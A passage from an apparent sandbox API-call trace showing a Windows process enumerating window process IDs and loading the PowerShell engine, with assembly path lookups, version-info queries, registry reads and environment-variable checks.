hWnd=0x10122, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.018] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x778 [0070.018] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x778 [0070.018] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.018] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.019] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.019] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.019] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.019] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.019] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.019] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.019] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x458 [0070.019] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.020] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.020] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x5c4 [0070.021] GetWindow (hWnd=0x5011c, uCmd=0x4) returned 0x0 [0070.022] IsWindowVisible (hWnd=0x5011c) returned 1 [0070.027] WerSetFlags () returned 0x0 [0070.037] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0070.038] CoTaskMemFree (pv=0x0) [0070.039] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adde8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adde0 | out: pulNumLanguages=0x1adde8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adde0) returned 1 [0070.039] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adde8, pwszLanguagesBuffer=0x2d218e8, pcchLanguagesBuffer=0x1adde0 | out: pulNumLanguages=0x1adde8, pwszLanguagesBuffer=0x2d218e8, pcchLanguagesBuffer=0x1adde0) returned 1 [0070.047] CoTaskMemAlloc (cb=0x24) returned 0x47fb30 [0070.047] GetUserDefaultLocaleName (in: lpLocaleName=0x47fb30, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0070.047] CoTaskMemFree (pv=0x47fb30) [0070.083] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0070.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.083] CoTaskMemFree (pv=0x3e43c0) [0070.087] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0070.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.087] CoTaskMemFree (pv=0x3e43c0) [0070.091] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0070.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.091] CoTaskMemFree (pv=0x3e43c0) [0070.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.106] SetErrorMode (uMode=0x1) returned 0x1 [0070.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ada60 | out: lpFileInformation=0x1ada60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0070.106] SetErrorMode (uMode=0x1) returned 0x1 [0070.106] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adcd0 | out: lpdwHandle=0x1adcd0) returned 0x94c [0070.108] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d25178 | out: lpData=0x2d25178) returned 1 [0070.109] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adc48, puLen=0x1adc40 | out: lplpBuffer=0x1adc48*=0x2d25214, puLen=0x1adc40) returned 1 [0070.109] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d252f0, puLen=0x1adbb0) returned 1 [0070.109] lstrlenW (lpString="Microsoft Corporation") returned 21 [0070.109] CoTaskMemAlloc (cb=0x2e) returned 0x479050 [0070.109] lstrcpyW (in: lpString1=0x479050, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0070.109] CoTaskMemFree (pv=0x479050) [0070.109] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d25344, puLen=0x1adbb0) returned 1 [0070.109] lstrlenW (lpString="System.Management.Automation") returned 28 [0070.109] CoTaskMemAlloc (cb=0x3c) returned 0x47a370 [0070.109] lstrcpyW (in: lpString1=0x47a370, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0070.109] CoTaskMemFree (pv=0x47a370) [0070.110] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d253a0, puLen=0x1adbb0) returned 1 [0070.110] lstrlenW (lpString="6.1.7601.17514") returned 14 [0070.110] CoTaskMemAlloc (cb=0x20) returned 0x47fb90 [0070.110] lstrcpyW (in: lpString1=0x47fb90, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0070.110] CoTaskMemFree (pv=0x47fb90) [0070.110] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d253e0, puLen=0x1adbb0) returned 1 [0070.110] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0070.110] CoTaskMemAlloc (cb=0x44) returned 0x47a370 [0070.110] lstrcpyW (in: lpString1=0x47a370, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0070.110] CoTaskMemFree (pv=0x47a370) [0070.110] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d25448, puLen=0x1adbb0) returned 1 [0070.110] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0070.110] CoTaskMemAlloc (cb=0x76) returned 0x4196e0 [0070.110] lstrcpyW (in: lpString1=0x4196e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0070.110] CoTaskMemFree (pv=0x4196e0) [0070.110] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d254e4, puLen=0x1adbb0) returned 1 [0070.110] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0070.110] CoTaskMemAlloc (cb=0x44) returned 0x47a370 [0070.110] lstrcpyW (in: lpString1=0x47a370, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0070.111] CoTaskMemFree (pv=0x47a370) [0070.111] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d25548, puLen=0x1adbb0) returned 1 [0070.111] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0070.111] CoTaskMemAlloc (cb=0x58) returned 0x3e33c0 [0070.111] lstrcpyW (in: lpString1=0x3e33c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0070.111] CoTaskMemFree (pv=0x3e33c0) [0070.111] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d255c4, puLen=0x1adbb0) returned 1 [0070.111] lstrlenW (lpString="6.1.7601.17514") returned 14 [0070.111] CoTaskMemAlloc (cb=0x20) returned 0x47fb90 [0070.111] lstrcpyW (in: lpString1=0x47fb90, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0070.111] CoTaskMemFree (pv=0x47fb90) [0070.111] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2d2526c, puLen=0x1adbb0) returned 1 [0070.111] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0070.111] CoTaskMemAlloc (cb=0x66) returned 0x3eeb10 [0070.111] lstrcpyW (in: lpString1=0x3eeb10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0070.111] CoTaskMemFree (pv=0x3eeb10) [0070.111] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x0, puLen=0x1adbb0) returned 0 [0070.111] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x0, puLen=0x1adbb0) returned 0 [0070.111] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x0, puLen=0x1adbb0) returned 0 [0070.111] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adb88, puLen=0x1adb80 | out: lplpBuffer=0x1adb88*=0x2d25214, puLen=0x1adb80) returned 1 [0070.111] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0070.111] VerLanguageNameW (in: wLang=0x0, szLang=0x432650, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0070.112] CoTaskMemFree (pv=0x432650) [0070.112] VerQueryValueW (in: pBlock=0x2d25178, lpSubBlock="\\", lplpBuffer=0x1adbd8, puLen=0x1adbd0 | out: lplpBuffer=0x1adbd8*=0x2d251a0, puLen=0x1adbd0) returned 1 [0070.127] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0070.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.127] CoTaskMemFree (pv=0x3e43c0) [0070.133] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0070.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.133] CoTaskMemFree (pv=0x3e43c0) [0070.139] lstrlenW (lpString="䅁") returned 1 [0070.155] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adaa8 | out: phkResult=0x1adaa8*=0x318) returned 0x0 [0070.157] RegOpenKeyExW (in: hKey=0x318, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ada98 | out: phkResult=0x1ada98*=0x31c) returned 0x0 [0070.157] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adb28 | out: phkResult=0x1adb28*=0x320) returned 0x0 [0070.162] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ada6c, lpData=0x0, lpcbData=0x1ada68*=0x0 | out: lpType=0x1ada6c*=0x1, lpData=0x0, lpcbData=0x1ada68*=0x56) returned 0x0 [0070.163] CoTaskMemAlloc (cb=0x5a) returned 0x3eec60 [0070.163] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ada3c, lpData=0x3eec60, lpcbData=0x1ada38*=0x56 | out: lpType=0x1ada3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ada38*=0x56) returned 0x0 [0070.163] CoTaskMemFree (pv=0x3eec60) [0070.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.210] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0070.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.210] CoTaskMemFree (pv=0x3e43c0) [0070.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0070.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0070.550] CoTaskMemAlloc (cb=0x104) returned 0x3e44d0 [0070.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e44d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.550] CoTaskMemFree (pv=0x3e44d0) [0070.552] CoTaskMemAlloc (cb=0x104) returned 0x3e44d0 [0070.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e44d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.552] CoTaskMemFree (pv=0x3e44d0) [0070.597] CoTaskMemAlloc (cb=0x104) returned 0x3e44d0 [0070.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e44d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.597] CoTaskMemFree (pv=0x3e44d0) [0070.599] CoTaskMemAlloc (cb=0x104) returned 0x3e44d0 [0070.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e44d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.599] CoTaskMemFree (pv=0x3e44d0) [0070.599] CoTaskMemAlloc (cb=0x104) returned 0x3e44d0 [0070.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e44d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.599] CoTaskMemFree (pv=0x3e44d0) [0070.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0070.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0070.769] CoTaskMemAlloc (cb=0x104) returned 0x3e44d0 [0070.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e44d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.769] CoTaskMemFree (pv=0x3e44d0) [0070.773] CoTaskMemAlloc (cb=0x104) returned 0x3e44d0 [0070.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e44d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.773] CoTaskMemFree (pv=0x3e44d0) [0070.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0071.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0071.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0071.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0071.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0071.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0072.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0072.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0072.086] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.086] CoTaskMemFree (pv=0x3e46f0) [0072.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0072.168] SetErrorMode (uMode=0x1) returned 0x1 [0072.168] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ada00 | out: lpFileInformation=0x1ada00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 